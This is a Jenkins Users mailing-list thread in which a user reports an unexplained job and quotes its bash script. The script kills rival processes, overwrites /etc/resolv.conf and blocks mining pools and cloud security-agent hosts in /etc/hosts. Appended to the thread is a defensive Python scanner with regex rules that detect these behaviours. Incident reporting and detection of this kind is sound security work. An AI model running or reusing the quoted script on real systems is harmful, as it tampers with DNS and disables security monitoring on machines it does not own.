Randall/Daniel, if there does end up being malware for this release would you mind replying on this thread?

On Monday, June 22, 2020 at 1:00:09 PM UTC-5, Daniel Beck wrote:
>
> Thanks for your report.
>
> I filed an issue on your behalf in the Jenkins project's private security issue tracker. You should have gotten an email notification from Jira about it. Please provide more information there to help us investigate.
>
> > On 22. Jun 2020, at 19:15, Randall Becker <[email protected]> wrote:
> >
> > Hi All,
> >
> > We just installed Jenkins 2.240 and suddenly there is a job with some really strange content, including:
> >
> > #!/bin/bash
> >
> > threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
> > hostHash=$(hostname -f | md5sum | cut -c1-8);
> > echo "${hostHash} - ${threadCount}";
> > ktr () {
> > killall trace;pkill -9 -f trace;killall -s SIGKILL trace
> > killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
> > killall viunix;pkill viunix;killall -s SIGKILL viunix
> > kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
> > kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
> > kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
> > echo kill
> > }
> >
> > ktr
> > ktr
> > ktr
> > echo plsfoodforcatsnlove
> > echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
> > echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
> > echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
> > echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
> > echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
> > echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
> > echo "0.0.0.0 minexmr.com" >> /etc/hosts
> >
> > This is really creepy because this script cannot possibly run on our system (the good part). The bad part is that no one in our organization created this job. Is it possible that there is some malware floating around? Our Jenkins instance is hiding behind a firewall so there's no way in.
> >
> > Thanks,
> > Randall
> >
> > --
> > You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
> > To unsubscribe from this group and stop receiving emails from it, send an email to [email protected].
> > To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.
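
Added example, not part of the thread and not Jenkins project code: a sweep of `$JENKINS_HOME/jobs/*/config.xml` for the behaviours visible in the job script quoted above (writes to `/etc/hosts` and `/etc/resolv.conf`, forced kill sweeps, hostname hashing). The rule names, the two-rule threshold and the sample XML are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Behaviours visible in the quoted job script; rule names are made up for this example.
RULES = {
    "hosts_tamper": re.compile(r">>?\s*/etc/hosts\b"),
    "resolver_overwrite": re.compile(r">>?\s*/etc/resolv\.conf\b"),
    "kill_sweep": re.compile(r"\b(?:killall|pkill)\b[^\n]*(?:-9\b|SIGKILL)"),
    "host_fingerprint": re.compile(r"hostname\s+-f\s*\|\s*md5sum"),
}
SCRIPT_TAGS = {"command", "script"}  # freestyle shell step, inline Pipeline script

def rule_hits(config_xml):
    """Return the sorted rule names matched by script text in one job config.xml."""
    # Drop the XML declaration so a version='1.1' header cannot trip the parser.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", config_xml, count=1)
    hits = set()
    for node in ET.fromstring(body).iter():
        if node.tag in SCRIPT_TAGS and node.text:
            hits.update(n for n, rx in RULES.items() if rx.search(node.text))
    return sorted(hits)

def scan_jobs(jenkins_home, min_hits=2):
    """Return {job name: hits} for jobs under jenkins_home/jobs matching >= min_hits rules."""
    flagged = {}
    for cfg in sorted(Path(jenkins_home).glob("jobs/*/config.xml")):
        try:
            hits = rule_hits(cfg.read_text(encoding="utf-8", errors="replace"))
        except ET.ParseError:
            flagged[cfg.parent.name] = ["unparseable_config"]  # review by hand
            continue
        if len(hits) >= min_hits:
            flagged[cfg.parent.name] = hits
    return flagged

# Constructed samples: a freestyle job carrying lines from the quoted script, and a benign one.
SAMPLE_BAD = """<?xml version='1.1' encoding='UTF-8'?>
<project><builders><hudson.tasks.Shell><command>#!/bin/bash
hostHash=$(hostname -f | md5sum | cut -c1-8);
killall trace;pkill -9 -f trace;killall -s SIGKILL trace
echo 'nameserver 1.1.1.1' &gt; /etc/resolv.conf
echo "0.0.0.0 pool.minexmr.com" &gt;&gt; /etc/hosts
</command></hudson.tasks.Shell></builders></project>"""
SAMPLE_OK = """<project><builders><hudson.tasks.Shell><command>make test
pkill -9 -f leftover-test-server || true</command></hudson.tasks.Shell></builders></project>"""

if __name__ == "__main__":
    print(rule_hits(SAMPLE_BAD), rule_hits(SAMPLE_OK))
```

A single rule hit, such as a cleanup `pkill -9` in an ordinary build, stays below the threshold; a job that combines several of these behaviours is the pattern to review, along with who created it and when.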
